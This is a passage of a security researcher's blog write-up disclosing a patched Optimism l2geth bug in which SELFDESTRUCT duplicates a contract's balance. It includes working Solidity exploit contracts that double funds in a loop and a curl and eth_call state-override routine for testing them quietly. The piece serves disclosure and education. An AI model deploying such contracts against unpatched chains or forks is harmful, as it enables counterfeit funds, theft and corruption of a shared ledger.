Attacking an Ethereum L2 with Unbridled Optimism

The Summary

On 2/2/2022, I reported a critical security issue to Optimism—an "L2 scaling solution" for Ethereum—that would allow an attacker to replicate money on any chain using their "OVM 2.0" fork of go-ethereum (which they call l2geth).

Optimism—whose platform currently uses a centralized "sequencer"—quickly moved both to fix this bug on their own nodes and infrastructure and to arrange for downstream projects that used their codebase (Boba and Metis) to get patched.

This article provides the backstory of how and why I found this bug and goes into my usual "extreme" level of detail on how the bug works (something I haven't bothered to do in article form in a while: I've mostly been just giving talks).

I will also be giving a talk at ETHDenver 2022, at 9:40am MST on February 18th, on this vulnerability. If you want to meet me while I'm there, I should be available for much of the event. (I'm also a "mentor", but that seems to be flexible.)

This article slowly transitions from high-level background and discussion into deep, low-level technical detail; but, at the end, I return for some high-level thoughts on the ethics of security research and incentive alignment in the cryptocurrency industry. If you start thinking "this is getting dry", try skipping ahead!

My Background

I am Jay Freeman, though I am mostly known online as "saurik" for my work on Cydia, an alternative to the App Store for jailbroken iOS devices. While I was a member of key jailbreak teams, I focused on everything "after the hack".

In other past work, I developed multiple jailbreaks for Android (implementing mempodipper and Master Key), wrote the first decompiler for .NET (Exemplar, for my Anakrino GUI), and worked on nmap's programmatic scanning features.

I give a lot of talks at conferences, where I sometimes present "Penn & Teller"-style exposés of exploit stacks. (This means my life for the past two years has been extremely reclusive and unhealthy, as I do not enjoy online conferences.)

I now am one of the remaining founders of Orchid, a project that builds a market for programmable bandwidth, along with Steven Waterhouse (a founding partner of Pantera Capital) and Brian Fox (developer of bash, readline, etc.).

Orchid Nanopayments

For Orchid, while I have no official/ratified title, I am "in charge of technology". In particular (as relevant to this article), I have implemented all of Orchid's smart contracts, including the one used for "nanopayments".

(While going into details of Orchid would be a digression, the reason Orchid cares about this is that users incrementally pay for access to the network with tiny payments, the fees for which would otherwise be too high.)

Our nanopayments integration—designed primarily by David Salamon, Justin Sheek, and myself, while leaning on the work done previously by Ronald L. Rivest at MIT and PepperCoin—amortizes transaction fees for very small transfers.

While, over enough time, our system can amortize even very large transaction fees, there are side effects: the size of the payments goes up and the number of payments goes down, leading to a higher variance of expected vs. actual payment.

It is thereby interesting to Orchid when people create new, cheaper blockchain technology, as Orchid's payments infrastructure is not inherently tied to any single chain, and a lot of my work involves exploring and evaluating new options.

Layer 2 Scaling

Orchid is, in some sense, what one might call a "layer 2 scaling solution": a payments system that runs as an ecosystem on top of another payments system. In our case, we implement what I have sometimes called a "probabilistic rollup".

Our nanopayments system certainly isn't the only layer 2, and—being mostly off-chain with probabilistic settlement—isn't even a prototypical one. That said, it is common for people to quibble over what, exactly, another system can be "considered".

The more commonly cited layer 2 solutions are systems such as Optimism or zkSync: each a prototypical example of an "optimistic rollup" and a "zero-knowledge rollup" (respectively). Vitalik (of Ethereum) wrote an overview of rollups.

Interestingly, the "2" in layer 2 is sometimes a bit arbitrary: layer 2 solutions that don't involve committing linear amounts of state to the underlying layer 1 can often compose or stack, allowing our nanopayments to run on another layer 2.

Cross-Chain Bridges

Many of the largest hacks we hear about in crypto happen to "bridges", the contracts and protocols that allow users of one blockchain to work with assets on another blockchain. These are often needed even between an L2 and its L1.

As it is usually, in practice, impossible to be assured of "finality"—the property that a transaction has well and truly committed and will never be reversed for any reason—in blockchain consensus systems, these bridges are fraught with inherent peril.

Often, at the end of the day, they end up even relying on trusted third-parties to authorize "withdrawals" (similar to banks, but before you try to claim "omg they re-invented banks": the ability to permissionlessly create a bank is a feature).

The mechanism generally involves depositing money in a locked-up reserve on one side of the bridge and then printing an IOU on the other/remote side that can be traded and later redeemed to unlock some of the previously-deposited money from the reserve.
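The lock-and-mint invariant can be sketched as a toy ledger (a hypothetical model; real bridges layer proofs, challenge delays, and authorization on top of this):

```go
package main

import (
	"errors"
	"fmt"
)

// Bridge is a toy lock-and-mint ledger: deposits lock funds in an L1
// reserve and mint an equal number of IOU tokens on L2; withdrawals
// burn IOUs to unlock funds from the reserve.
type Bridge struct {
	reserve uint64            // funds locked on the L1 side
	ious    map[string]uint64 // IOU balances on the L2 side
}

func NewBridge() *Bridge {
	return &Bridge{ious: make(map[string]uint64)}
}

func (b *Bridge) Deposit(user string, amount uint64) {
	b.reserve += amount    // lock on L1...
	b.ious[user] += amount // ...mint on L2
}

func (b *Bridge) Withdraw(user string, amount uint64) error {
	if b.ious[user] < amount {
		return errors.New("insufficient IOUs")
	}
	b.ious[user] -= amount // burn on L2...
	b.reserve -= amount    // ...unlock on L1
	return nil
}

func main() {
	b := NewBridge()
	b.Deposit("alice", 100)
	_ = b.Withdraw("alice", 40)
	fmt.Println(b.reserve, b.ious["alice"]) // stays in sync: 60 60
}
```

The entire security model rests on the invariant that the reserve always equals the outstanding IOUs; the attacks discussed below are ways of breaking that invariant from one side or the other.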

All the Bridges Falling Down

When bridges are attacked, generally someone managed to trick the smart contract that is holding the pile of money backing the IOUs into incorrectly releasing it, meaning IOUs on the other side of the bridge might not be redeemable.

On the same day that I reported the virtual machine bug discussed in this article to Optimism, a cross-chain bridge called Wormhole that connects Ethereum to Solana was hacked, and someone walked away with ~$325 million worth of Ether.

Maybe surprisingly, the company that owned Wormhole immediately decided to take responsibility for the issue, and replaced all of the money in the reserves. In the case of a previous hack on Poly Network, the hackers returned ~$610 million.

It is my contention that hacks on bridges tend to be noticed quickly, as the people operating the bridge generally notice when "their money" (which they owe to other people, of course) disappears. Fixing the issue involves replacing the stolen capital.

After the Hack

Even when hackers do steal money from a bridge, the ramifications are limited as "it's only money": if you steal the cash from a bank's vault, this is certainly a problem for them, and any "bail out" might be very costly for their backers...

...and yet, the bank should be thankful their record of accounts is safe: if they were no longer sure who owned what or which transfers were legitimate—with clients demanding conflicting corrections—the resulting dispute might never end.

(We can even here consider the idea of "insurance policies" against crypto hacks, particularly given that many of these bridges are semi-centralized and can "mitigate" hacks ahead of time, fixing issues before they result in loss.)

Such theft also tends to be maybe-surprisingly fruitless, with associated wallets being blacklisted by various exchanges (which people have postulated will cause the ecosystem problems in the future, making some Bitcoin akin to "blood diamonds").

My Attack: Unbridled Optimism

The bug presented here—which I dub "Unbridled Optimism"—can maybe be (crudely) modelled as a bug on the far side of a "bridge", but is actually a bug in the virtual machine that executes smart contracts on Optimism (an aforementioned L2 rollup).

Exploiting this enables the attacker to have access to an effectively unbounded number of tokens (aka, the IOUs) on the far side of the bridge. It is my contention that this is more dangerous than merely tricking the reserves into allowing a withdrawal.

With the ability to sneakily print IOUs (known on Optimism as OETH) on the other side of the bridge, you can still try to (slowly) withdraw money from the reserves, but now it will look like a legitimate transfer, making it easier to go unnoticed.

(And, in case you believe that "someone would notice if the total number of IOUs were different than the amount of money locked in the reserves", this bug actually was triggered 40 days ago—as I will point out later—and no alarm bells were raised.)

Maximum Carnage

Further, with your unbounded supply of IOUs, you could go to every decentralized exchange running on the L2 and mess with their economies, buying up vast quantities of other tokens while devaluing the chain's own currency.

Using your access to infinite capital, you could further manipulate on-chain pricing oracles to leverage for other attacks; and, until someone finally realizes your money is counterfeit, arbitragers will flock to the network to sell you their assets.

This makes this bug capable of economic griefing attacks, wherein once someone notices—even if it is a mere hour later!—it might be "too late" to unravel what is and what isn't a legitimate transaction, calling into question the entire ledger.

The next few sections involve a combination of lived and researched history of the Optimism project... which I entirely admit I might have gotten wrong somewhere. The goal here is to set up my interaction with the project and how I came to discover this bug, as I essentially write magazine-level content about software hacks ;P.

George Hotz Cameo

One of my favorite episodes of Optimism has a cameo by George Hotz, the hacker who first unlocked an iPhone (and then continued to work on jailbreaks for years before moving on to work on AI and aftermarket autonomous driving kits).

An early premise of Optimism was to support "non-interactive fraud proofs", wherein if the L2 state committed to L1 were "incorrect", someone could prove that to the smart contracts running on the system by using an (expensive) on-chain simulator.

The issue they had was that, for their model to work efficiently, Optimism couldn't build an interpreter, and instead needed a "transpiler" that replaced any instruction that accessed blockchain state with function calls on system smart contracts.
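The transpiler idea can be sketched as a trivial rewrite pass (a toy model with illustrative names; OVM 1.0's actual system contracts and method signatures differ in detail):

```go
package main

import "fmt"

// transpile sketches the OVM 1.0 strategy: any opcode that touches
// blockchain state is replaced with a call into a system contract that
// the on-chain fraud-proof simulator can also execute. The contract and
// method names here are illustrative stand-ins.
func transpile(ops []string) []string {
	replaced := map[string]string{
		"SLOAD":  "CALL ExecutionManager.ovmSLOAD",
		"SSTORE": "CALL ExecutionManager.ovmSSTORE",
	}
	out := make([]string, 0, len(ops))
	for _, op := range ops {
		if r, ok := replaced[op]; ok {
			out = append(out, r) // state access becomes a contract call
		} else {
			out = append(out, op) // pure computation passes through
		}
	}
	return out
}

func main() {
	fmt.Println(transpile([]string{"PUSH1", "SLOAD", "SSTORE"}))
}
```

The point is that the rewritten code no longer needs a bespoke interpreter: it is itself EVM code, just with its state accesses indirected.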

"geohot" (as he is known to many of us) helped them by writing a modification to the compiler for Solidity—the language most people use to write smart contracts—that would allow people to rapidly generate OVM-compatible contract code.

OVM 1.0 uses OVM_ETH ERC20

The issue with this—and bear with me here, as this is relevant—is that this strategy was only compatible at the level of Solidity source code and couldn't run existing contracts already compiled for the Ethereum Virtual Machine.

Even as they worked to fix this for the first real release of their "OVM", there was "historical baggage" that remained, both in the code and in the minds of the ecosystem that pushed the project down roads of further EVM incompatibility.

The biggest "most glaring" issue that I ran into while attempting to use Optimism at this time (late 2020) was that there was no native support for a "gas token": Ether stored on Optimism's L2 was instead represented by an ERC20 token.

We do not have built in native Ether support. For example, this means you will not be allowed to use BALANCE or SELFBALANCE (Note: you can use CALLVALUE, it will just always return 0).

All “ETH” on L2 will be an ERC20. Upon depositing ETH into our deposit contracts on L1, it will automatically be converted to ERC20 ETH on L2. If you wish to use ETH in your contract, instead just interact with it like you would with a normal ERC20 contract. This allows projects to not have to write their contracts to support both ERC20s and ETH, but rather just ERC20s (e.g. 0x, Uniswap).

We do have plans in the future to make our custom compiler automatically convert opcodes like BALANCE to ERC20ETH.balanceOf(addr) although this is currently not a priority until after mainnet. If this type of functionality is critical for your application, please let us know in Discord!

I'd actually read this, quite hopeful that this direction could be changed early on, and joined their Discord server on December 6th of 2020 in order to make the case that this incompatibility with the EVM semantics would lead to problems.

I ended up—as often happens with chat servers :/—in an argument with a random user who was acting extremely authoritative (to the point where I had started to model them as a key developer) that this was actually a great design decision.

Regardless, Orchid's multi-chain effort fundamentally requires that the same code be deployable on every network—so the list of supported chains can be "permissionless" and up to the user ecosystem—forcing me to pass on Optimism.

EVM "Equivalence"

Of course, a year later, it had become clear that not being compatible with existing smart contracts and developer tooling was, in fact, a serious problem; and, so, the Optimism project began work on what they called "EVM Equivalence".

This upgrade, to be named OVM 2.0, was of great interest to my work on Orchid, as it meant that the new multi-chain nanopayments platform I had been pushing us towards could finally be deployed. I thereby jumped back into Optimism.

When working with a new chain, the first thing I tend to do is run a quick unit test of functionality I either rely on or prefer (a test suite of sorts that has found bugs in numerous chains that I have reported over the past year).

Immediately, I ran into a confusing issue with Optimism: the account state—as cryptographically verifiable from the block "state root"—somehow was missing the account balance (which was, instead, always 0). I filed a bug about this.

OVM_ETH Lives on in OVM 2.0

The response to my bug report somewhat shocked me: it turned out that OVM 2.0 continued to store all of the balances for user accounts in the storage state of an ERC20 contract, and they were having an active discussion about whether to remove this.

Regardless, this became a continual "thorn in my side" as I began working, over the last month or so, on another project of mine: an extremely pedantic and heavily-indexed block explorer that introspects every state update of the entire EVM.

Between this, that Optimism timestamps are backdated (something they did fix) or even non-monotonic, and how they keep rebooting their chain, Optimism has caused me to spend a disproportionate amount of time feeling... "pessimistic" ;P.

(However, I will say that the developers of this project are actually quite pleasant to work with, and so I have at least had fun talking with them on Discord while trying to access older data and filing bugs for high-level design issues.)

StateDB UsingOVM Redirection

The way this "store the native balances in an ERC20 token storage state" is implemented in the codebase is as a set of patches to go-ethereum's StateDB, the code which maintains an in-memory buffer of pending/dirty account objects to flush to disk.

(The way Ethereum stores this state—and the state trie data structure it uses to allow efficient cryptographic verification of cherry-picked data—is one of the more fascinating and useful parts of the protocol design; here is another reference.)

The UsingOVM flag is set with a USING_OVM environment variable (with no corresponding command line flag, as far as I know; that you need to set this environment variable while initializing the genesis block took me too long to figure out ;P).

Operations on the StateDB that affect an account balance are then redirected from the underlying stateObject (which represents an individual, cached account) to storage state in the OVM_ETH contract. Below is the code for state.StateDB.SetBalance.

NOTE: I heavily re-format and even somewhat "editorialize" code snippets to make them narrower, shorter, and less dense. If you go look at the actual code, don't be surprised when it doesn't look exactly the same as my presentation ;P.

    func (s *StateDB) SetBalance(
        addr common.Address, amount *big.Int,
    ) {
        if rcfg.UsingOVM {
            key := GetOVMBalanceKey(addr)
            value := common.BigToHash(amount)
            s.SetState(dump.OvmEthAddress, key, value)
        } else {
            stateObject := s.GetOrNewStateObject(addr)
            if stateObject != nil {
                stateObject.SetBalance(amount)
            }
        }
    }

Now, there's actually already something interesting going on: s.GetOrNewStateObject has an observable side effect; but, when UsingOVM, this doesn't get called. This means that an account might own native currency without having an account object!

The exact issue here is that contracts are able to ask for the hash of the code of other accounts (which is sometimes used to verify their trusted behaviors). If an account has no code, its code is "", so its codehash is the hash of an empty buffer.

However, if you ask for the codehash of an address that isn't currently backed by an object in the state trie, the codehash you get back is null. This observable effect is an example of the subtle incompatibilities that Optimism keeps experiencing.
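A toy model makes the discrepancy concrete (stand-in hash values and types, not geth's actual ones; the real "hash of empty code" is keccak256 of the empty byte string):

```go
package main

import "fmt"

// Stand-in values: geth returns keccak256("") for an existing account
// with no code, but the zero hash for an address with no account object.
const emptyCodeHash = "keccak256(\"\")"
const zeroHash = "0x0"

type account struct{ code []byte }

// codeHash models the observable EXTCODEHASH behavior: the answer for a
// missing account differs from the answer for an empty one.
func codeHash(accounts map[string]*account, addr string) string {
	obj, ok := accounts[addr]
	if !ok {
		return zeroHash // no state object at all: "null" hash
	}
	if len(obj.code) == 0 {
		return emptyCodeHash // account exists, just has no code
	}
	return "hash(code)"
}

func main() {
	accounts := map[string]*account{"empty": {}}
	// A funded-but-objectless OVM account answers like "missing", not "empty":
	fmt.Println(codeHash(accounts, "missing") == codeHash(accounts, "empty")) // false
}
```

Because SetBalance skips GetOrNewStateObject when UsingOVM, a funded account can fall into the "missing" branch where stock Ethereum would have created the object and answered with the empty-code hash.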

(If this were my project, I'd definitely have dropped everything long ago—pre-OVM 2.0—to prioritize removing this set of patches by fixing GetOVMBalanceKey to store hash preimages, re-executing the chain, and then swapping out the state trie.)

Why is it always SELFDESTRUCT?!

One of the more "problematic" instructions in the Ethereum VM is SELFDESTRUCT, which goes back to the original design. (For clarity: this instruction used to be called SUICIDE, but the code—which we will be reading—was never renamed.)

This instruction allows a contract to destroy itself, removing its account object. The primary benefit of this instruction is that it allows for potentially large amounts of "obsolete" state to be cleaned up quickly from the blockchain's active set.

On the other hand, what makes this instruction "problematic" (besides its triggering name) is that it allows for potentially LARGE amounts of state to be cleaned up VERY QUICKLY, requiring the VM to do an arbitrary amount of work, atomically.

This instruction has further been known to continually cause corner cases in new EVM features, and so has often been threatened with some form of removal (such as banning it in new contracts or removing most of its functionality).

When a contract hits the SELFDESTRUCT instruction, it designates a "beneficiary" to receive any funds it still owns. The implementation of this opcode in go-ethereum's EVM adds the balance to the beneficiary and then calls StateDB.Suicide.

    func opSuicide(
        pc *uint64, interpreter *EVMInterpreter,
        contract *Contract, memory *Memory,
        stack *Stack,
    ) ([]byte, error) {
        state := interpreter.evm.StateDB
        beneficiary := common.BigToAddress(stack.pop())
        balance := state.GetBalance(contract.Address())
        state.AddBalance(beneficiary, balance)
        state.Suicide(contract.Address())
        return nil, nil
    }

The implementation of StateDB.Suicide then clears the balance of the account back to 0. Frustratingly, it does this using neither the stateObject's setBalance setter nor the shared common.Big0 constant, making this a bespoke piece of logic.

    func (s *StateDB) Suicide(addr common.Address) bool {
        stateObject := s.getStateObject(addr)
        if stateObject == nil {
            return false
        }
        stateObject.markSuicided()
        stateObject.data.Balance = new(big.Int)
        // aka stateObject.setBalance(common.Big0)
        return true
    }

StateDB.Suicide, in turn, calls stateObject.markSuicided, which does nothing other than set a boolean value on the object to true. Importantly, this means that the contract at this point STILL EXISTS and continues to have the code it previously had!

    func (s *stateObject) markSuicided() {
        s.suicided = true
    }

Pending Deletion

This raises the question: how does the object ever actually get destroyed? The answer is that this is postponed to the end of the transaction, when StateDB.Finalise is called and all of the suicided dirty account objects are marked deleted.

    func (s *StateDB) Finalise() {
        for addr := range s.journal.dirties {
            obj, exist := s.stateObjects[addr]
            if !exist {
                continue
            }
            if obj.suicided || obj.empty() {
                obj.deleted = true
            } else {
                obj.finalise()
            }
        }
        s.clearJournalAndRefund()
    }

(As a further optimization, the actual account object isn't truly deleted until the next time the state root hash needs to be calculated, as all of the changes to the merkle trie can then be made and committed at once. This isn't relevant, though.)

    func (s *StateDB) IntermediateRoot() common.Hash {
        s.Finalise()
        for addr := range s.stateObjectsPending {
            obj := s.stateObjects[addr]
            if obj.deleted {
                s.deleteStateObject(obj)
            } else {
                obj.updateRoot(s.db)
                s.updateStateObject(obj)
            }
        }
        return s.trie.Hash()
    }

The Actual Bug

By this point, we actually "passed by" the critical bug... did you catch it? ;P The code for Suicide is still directly modifying the stateObject's data.Balance field instead of checking UsingOVM and redirecting that modification to OVM_ETH.

This means that, when a contract self-destructs, its balance is BOTH given to the beneficiary AND ALSO KEPT. If the contract had 10 OETH, 10 OETH are CREATED from thin bits and handed to the beneficiary.
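The core of the bug can be modelled in a few lines (the names here are mine, not l2geth's): the real balances live in OVM_ETH storage, but Suicide only zeroes the (redirected-away-from) per-account balance field.

```go
package main

import "fmt"

// toyStateDB models the two places a balance can live when UsingOVM:
// the OVM_ETH storage slots (the real balances) and the stateObject's
// data.Balance field (which the OVM overrides are supposed to bypass).
type toyStateDB struct {
	ovmBalance map[string]uint64 // OVM_ETH storage: what GetBalance reads
	objBalance map[string]uint64 // stateObject data.Balance: ignored by reads
}

// opSuicide models the buggy l2geth flow for SELFDESTRUCT.
func (s *toyStateDB) opSuicide(contract, beneficiary string) {
	balance := s.ovmBalance[contract]    // GetBalance reads OVM_ETH...
	s.ovmBalance[beneficiary] += balance // ...AddBalance writes OVM_ETH...
	s.objBalance[contract] = 0           // ...but Suicide clears only data.Balance!
}

func main() {
	s := &toyStateDB{
		ovmBalance: map[string]uint64{"exploit": 10},
		objBalance: map[string]uint64{},
	}
	s.opSuicide("exploit", "exploit") // beneficiary is the contract itself
	fmt.Println(s.ovmBalance["exploit"]) // 10 OETH became 20
}
```

With the beneficiary set to a third party, the contract keeps its 10 OETH and the beneficiary gains 10 more; with the beneficiary set to the contract itself, the balance simply doubles in place.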

When Optimism fixed this bug—as part of PR #2146 (which slightly hid this update in a pile of other updates to give time for unknown forks to update their code)—they added the following logic to opSuicide (notably, not StateDB.Suicide).

    if rcfg.UsingOVM && interpreter.evm.chainConfig.
            IsSelfDestructInflation(interpreter.evm.BlockNumber) {
        state.SubBalance(contract.Address(), balance)
    }

As far as I can tell, the reason they needed to put this code in opSuicide—which separates it from the other logic that directly clears the balance field as well as all of the other UsingOVM overrides—is so they can get access to the chainConfig.

This is important, because the code still needs to implement the wrong behavior to allow it to synchronize all of the historical state, some of which actually tickled this bug (without exploiting it). They decided block 3135900 would be the cutoff.

    // OpMainnetSelfDestructForkNum is the height at which the
    // suicide inflation bug hardfork activates on OP mainnet.
    OpMainnetSelfDestructForkNum = big.NewInt(3135900)

Was this Exploited?

One of the questions we often want to answer is "has anyone else already pulled off an exploit using this bug?". To answer this, I instrumented the code for the OVM 2.0 to log any time a transaction destroyed a contract with a balance.

As SELFDESTRUCT is already a rare opcode, and this is even then a subset of all uses of SELFDESTRUCT—and further, as OVM 2.0 was only released three months ago—there was only a single user who had ever tried this: on Christmas Eve (2021).

In those transactions (as seen on the Optimism block explorer hosted by Etherscan) we see a user creating and destroying three contracts. The first two times, the contract's beneficiary is the 0x0 address, while the third time it is the user themself.

It frankly felt like someone had noticed the bug—seeing that Etherscan left the balance in place after the contract was destroyed—and even played with it a bit (to see if this was a behavior of 0x0)... but hadn't realized it was exploitable.

I actually managed to track down this user (!!) and it turns out they work for Etherscan ;P. It just goes to show that sometimes even people who are staring directly at a bug don't always see the indirect security implications.

I have not, myself, had time to verify that this was never triggered on the two known-to-me forks of Optimism: Boba and Metis. I feel like someone else might have checked by now and told me, and I also feel it is probably somewhat unlikely (given the lack of usage on Optimism), but I can't say for sure one way or the other at this time.

Concrete Exploit

Which brings us to the fun part: a hands-on exploration of exploiting this bug. To do this, we need to write a contract (in Solidity) that we can deploy/fund and on which we can call SELFDESTRUCT, replicating the money it is holding.

As the contract continues to exist until the end of the transaction, and we want to replicate money as fast as possible (by compounding our earnings), we set the contract itself as the beneficiary. This way, each call to destroy doubles its funds.

To allow the contract to be funded in the first place, we have to add a payable constructor. Finally, we add a method that allows us to get the money back out of the contract (I originally used selfdestruct, but transfer is cleaner).

    pragma solidity 0.7.6;

    contract Exploit {
        constructor() payable {}

        function destroy() public {
            selfdestruct(payable(address(this)));
        }

        function take() public {
            msg.sender.transfer(address(this).balance);
        }
    }

To drive this attack, we need another contract which creates an instance of this contract, calls destroy in a loop, and then calls take. I decided to put this logic in the constructor of the contract, so it could be created and executed in one transaction.

    contract Attack {
        constructor(uint count) payable {
            Exploit exploit = new Exploit{value: msg.value}();
            for (; count != 0; --count)
                exploit.destroy();
            exploit.take();
            msg.sender.transfer(address(this).balance);
        }

        receive() external payable {}
    }

As this contract will be receiving funds from the Exploit contract it instantiates, it needs a payable receive() implementation (as otherwise the contract will reject any attempt to give it money using transfer; notably, selfdestruct would bypass this!).

Safe/Easy Testing

While one way to test this exploit would be to simply run it, doing so might not only cause problems later in guaranteeing that the state is still legitimate, but could also tip off other people watching the blockchain who are looking to steal our exploit.

That might sound far-fetched, but it is actually quite common and is heavily automated: in this case, our exploit is so "plug-and-play" that if someone merely simulated running it themselves they would become the beneficiary.

While I will leave attempts to build more obfuscated exploits as "an exercise for the reader", if nothing else you need a way to test the behavior of your exploit while developing it, and so we need an easy way to simulate running instructions.

At this point someone might suggest an off-the-shelf test-driver—such as Ganache—but it wouldn't have this bug. We could give it the bug, but that's work. We could run our own local fork of Optimism, complete with sequencer, but that's also work.

Instead, we want a way to use a "normal" Optimism full node—preferably one we run ourselves (as we're talking about a very serious exploit), though for our exploration here the public endpoints will work just fine!—to run our exploit.

eth_call State Overrides

The solution is the JSON/RPC method eth_call. Now, I get it: "eth_call is obvious; I know about eth_call". (In case you don't: eth_call is a method exposed by Ethereum nodes that allows you to speculatively run exported Solidity functions.)

However, it isn't actually so obvious: if you read the documentation for eth_call, it is only going to let us run code that is already deployed to the blockchain, which we really want to avoid at all costs, lest someone notice our exploit.

The trick is that go-ethereum—the most commonly used EVM implementation—additionally supports "state overrides" on eth_call that let us pose hypothetical execution environments by changing the code or balance of an account.

Our strategy will thereby be to develop a tiny contract that scripts all of the behaviors we need (instantiating and funding Attack) and then returns any information we need to see if our code worked (in this case, our final balance).

    contract Test {
        function test() public payable returns (uint256) {
            new Attack{value: msg.value}(1);
            return address(this).balance;
        }

        receive() external payable {}
    }

JSON/RPC via curl

To make this a "hands-on" exercise, I'm going to walk you through compiling and executing this contract using nothing but curl, jq, xxd, and (for the Solidity compiler) docker (though you can alternatively install solc on your system).

NOTE: Optimism's public RPC server is (apparently) being run by QuickNode, and they only are set up to allow a trivial number of historical queries; so, when doing calls on old blocks, you might get a null result back with the error "Archive Requests/month limit reached - Please consider upgrading at"; if this happens, you will (sadly) have to run your own full Optimism node to see the result.

First we define an rpc variable to contain the URL of our Optimism full node. Then, we define an rpc function that will take a JSON object via stdin, add to it the JSON/RPC protocol fields using jq, and then post it to the RPC server using curl.

    rpc=

    function rpc() {
        jq '.+{jsonrpc:"2.0",id:1}' |
            curl -H 'Content-Type: application/json' \
                -s "$rpc" --data-binary @-;
    }

Next, we will compile the contract (named attack.sol); in the build folder we will have three .bin files, one for each of Exploit, Attack, and Test. These bin files don't actually represent the code for the contract: they are the code for the constructor.

    # don't do this if you installed solc
    alias solc='docker run -v "$PWD":/mnt \
        -w /mnt ethereum/solc:0.7.6'

    solc -o build attack.sol --bin --overwrite

The constructor returns the code for the contract itself, so we are going to override the state of a random account to make its code the code of this constructor (this would never actually happen) and then eth_call it to get its return value.

    rnd=0x$(head -c 20 /dev/urandom | xxd -ps)

    tst=$(echo '{"method":"eth_call","params":[
        {"to":"'"$rnd"'"},"latest",{"'"$rnd"'":
            {"code":"0x'"$(cat build/Test.bin)"'"}
    }]}' | rpc | jq -r .result)

Testing the Fix

Now that we have the code for the Test contract itself, we can override the code on our random address to that and then eth_call the test() method. We will also create a second address to be the caller, and override its state to own money.

    frm=0x$(head -c 20 /dev/urandom | xxd -ps)

    function tst() { set -e; blk=$1; shift 1;
        echo '{"method":"eth_call","params":[{
            "data":"0xf8a8fd6d",
            "from":"'"$frm"'",
            "value":"0x1",
            "to":"'"$rnd"'"
        },"'"$blk"'",{
            "'"$frm"'":{"balance":"0x1"},
            "'"$rnd"'":{"code":"'"$tst"'"}
        }]}' | rpc | jq -r .result;
    }

If you take the time to pull apart all of the shell quoting (sorry), you will note that the "data" we send to the contract is 0xf8a8fd6d. This is the first 32 bits (four bytes) of the keccak256 hash of "test()", which serves as the message selector for that function.

We can now run the exploit. The tst function I defined takes an argument blk (that must be in hex) which is the block number "at which" to run our code; this allows us to try running our code before and after OpMainnetSelfDestructForkNum.

    $ echo $(($(tst $(printf 0x%x 3135900))))
    1
    $ echo $(($(tst $(printf 0x%x 3135899))))
    2

When running this on a block after (or including) 3135900, we will only have the 1 token we started with (sent as the value parameter in tst). However, when running on blocks before 3135900, we get the result 2 (as Test has Attack double once).

Yet Another Incompatibility

At this point, you might wonder what happens if we try this on other EVM-compatible blockchains, such as Ethereum or Avalanche. We merely need to change the rpc variable and re-run tst. The result we get is... 0. Not 2 (of course), but also not 1.

    $ rpc=
    $ echo $(($(tst latest)))
    0

One of the tropes in the "Bag of Hacks" talk I give at hackathons and college classes is that, quite often, security fixes are done in a hurry by people who are attempting to mitigate a specific flaw and the resulting "fix" breaks something else.

I actually noticed this while testing Boba and Metis—which are forks of Optimism—in the middle of the night when I realized that they would also be affected (but wasn't sure if the Optimism people had reached out to them already; they had).

What is Wrong

In this case, the code that was added to opSuicide subtracted the prior balance from the contract to clear it. This is, to be fair, extremely reasonable behavior... I dare say it is more reasonable than the behavior Ethereum originally implemented ;P.

The way that the original code worked, however, is that it directly set the balance to 0. This means that if you selfdestruct to yourself, instead of 1+1-1 being 1, the resulting balance is forced to 0. I noted this in the discussion on the pull request.
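The difference between these two semantics only matters when a contract self-destructs with itself as the beneficiary. Here is a minimal arithmetic sketch of that case (simplified bookkeeping only, not the actual l2geth code; the variable names are mine):

```shell
# Hypothetical sketch: a contract holding 1 wei self-destructs with itself
# as the beneficiary.
prior=1

# Both implementations first credit the beneficiary -- here, the contract
# itself -- with the contract's own balance: 1 + 1 = 2.
balance=$((prior + prior))

# Ethereum's original semantics: the destructed account's balance is forced
# directly to zero, regardless of what was just credited to it.
ethereum=0

# The patched OVM semantics: subtract only the prior balance, so the wei
# credited by the self-transfer survives: 2 - 1 = 1.
ovm=$((balance - prior))

echo "$ethereum $ovm"
```

Running this prints "0 1": the same transaction that destroys the money on Ethereum leaves it alive on the patched OVM, which is exactly the 0-versus-1 discrepancy observed above.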

(Honestly, I'm actually thinking this is "probably close enough", given that—as mentioned earlier—the OVM is already getting other semantics surrounding this wrong, and the result is just that money that would have been destroyed survives.)

(That said, it also wouldn't surprise me if these incompatibilities between the EVM and the OVM can be compounded with assumptions made by various contracts people might choose to deploy to expose and exploit other vulnerabilities.)

What follows is me being "super real" and attempting to enter into a particularly deep conversation about morality. Conversations like this are, in some sense, the dessert at the end of a long meal. The tech is over, but maybe you'd like to stay for a bit?

I partly say this because some people—who I notably do not consider part of "my audience" ;P—hate this stuff; but, I also say this because I want to be clear: these are vulnerable thoughts that people don't say out loud enough.

That said, I also sometimes think that these conversations only really work when done in person, during the third hour of a five-hour late-night Q&A session at a hackathon like SpartaHack. OMG do I miss attending in-person SpartaHack :(.

Crypto Ethi-nomi-cs

Something I tend to spend a lot of time talking about—as a "grey hat" security researcher who works in a field where we routinely hoard bugs and drop fully-weaponized exploits of 0-day vulnerabilities (our jailbreaks)—is "the ethics of hacking".

In the case of limited hardware and the fight against digital rights management (which includes the use of Intel SGX, the reason I take issue with MobileCoin), the moral tradeoffs have become somewhat clear to me over the years.

However, working with cryptocurrencies feels a lot murkier. Do we truly believe that "code is law", such that if someone finds a bug that lets them walk away with a billion dollars, everyone else should just think "I guess I made a mistake"?

If you do, does your decision on that front change if you aren't going to personally profit, but will instead destroy a system people were using? FWIW, no matter how much we say "code is law", I personally have a hard time with destruction as ethical.

And yet, if we do not believe that destruction is ethical, and we are going to assign such strong moral judgement to people who destroy rather than build, how can we avoid falling into the trap of building systems that only work due to trust?

Move Fast and Lose Cash

So, one of the more "fun" things about working in crypto is exactly what makes it "scary": the (monetary) stakes tend to be extremely high. One ramification of this is that security research matters a lot more than in other fields of software.

And yet, a complaint that I too often have about crypto projects is that they sometimes seem to play fast and loose with consensus or correctness while they "move fast and break things" their way to access large amounts of investment capital.

Meanwhile, projects that take more conservative approaches are seen to "move slowly and too carefully"; and, as with Web 2.0 companies that spend "too much" time protecting user privacy before launching new features, they are at a disadvantage.

I thereby sometimes balk at "helping" other projects with basic issues of decentralization or security, as I feel like those can't be afterthoughts: this stuff is too important to be releasing quickly and adjusting the design in the field.

And yet, we see crypto project after crypto project trying to externalize the cost of their core design to people being only indirectly compensated, rather than building a team around mathematicians, economists, and security experts.

Financial Invectives

